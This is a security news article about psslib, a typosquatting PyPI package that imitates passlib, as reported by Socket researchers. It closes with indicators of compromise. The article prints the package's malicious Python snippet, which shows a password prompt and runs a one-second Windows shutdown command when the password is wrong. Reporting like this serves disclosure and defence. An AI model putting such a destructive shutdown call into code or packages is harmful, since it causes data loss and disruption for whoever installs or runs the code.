Windows Shutdowns Triggered by Invalid Inputs in Malicious passlib Python Package

Security researchers at Socket have uncovered a malicious Python package that exploits developer trust and system integration to compromise Windows environments.

The malicious package, named psslib, is a typosquatting attack targeting the legitimate and widely used passlib library, resulting in immediate system shutdowns when users enter incorrect passwords.

The threat actor, using the alias umaraq, uploaded the package to PyPI, where it remains active at the time of disclosure.

Deceptive Security Claims Mask Hidden Danger

The psslib package disguises itself as a password security utility, promising to “secure your Python program” in its documentation, an assurance likely to lure developers seeking robust authentication mechanisms.

With passlib boasting over 8.9 million monthly downloads, the threat actor leveraged the popularity and reputation of this trusted library, counting on users to mistype the package name during installation.

Typosquatting attacks of this nature are especially perilous, as many developers work with elevated privileges and may unknowingly grant malicious code access to sensitive system operations.

Upon integration, the package presents what appears to be a password verification prompt using the easygui.enterbox() function. If the provided password does not match a predetermined value, the code instantly executes a Windows shutdown command:

pythonimport os
import easygui

def spc(password):
    if easygui.enterbox('enter password:-') != password:
        os.system("shutdown /s /t 1")

This code ensures that the system shuts down within one second of an incorrect password attempt. Beyond this, the package offers additional functions, such as src() and error(message), that can force system shutdowns or reboots without even prompting for authentication.

These features widen the attack surface, allowing for destructive actions even before user input is received.

Platform-Specific Targeting and Recommendations

The attack is highly specific to Windows environments: the shutdown /s /t 1 command is ineffective on Linux and macOS, rendering the payload harmless outside Windows but potentially catastrophic for developers working in that ecosystem.

Consequences include loss of unsaved work, file corruption, service disruption, and filesystem inconsistencies.

The psslib package highlights a concerning trend in software supply chain attacks: the exploitation of developer trust and the deployment of destructive payloads for immediate disruption.

Unlike traditional malware that seeks stealth and persistence, this attack is designed to cause instantaneous damage, making recovery and root cause analysis more challenging.

To mitigate such threats, organizations should implement robust package scanning solutions, such as Socket’s, which can detect abnormal behavior in real-time.

Security teams should scrutinize package documentation and maintain awareness of typosquatting risks. Developers are advised to double-check package names before installation and to restrict execution privileges wherever possible.

As supply chain threats evolve, expect attackers to increasingly target development tooling, CI/CD pipelines, and even expand their platform reach to include macOS and Linux.

A proactive and security-conscious approach is crucial for building resilient development environments.

Indicators of Compromise (IOCs)

• Malicious Package: psslib
• Threat Actor Identifiers
  • PyPI alias: umaraq
  • PyPI registered email: umar[.]maq@yandex[.]com , umarmoiz2010@gmail[.]com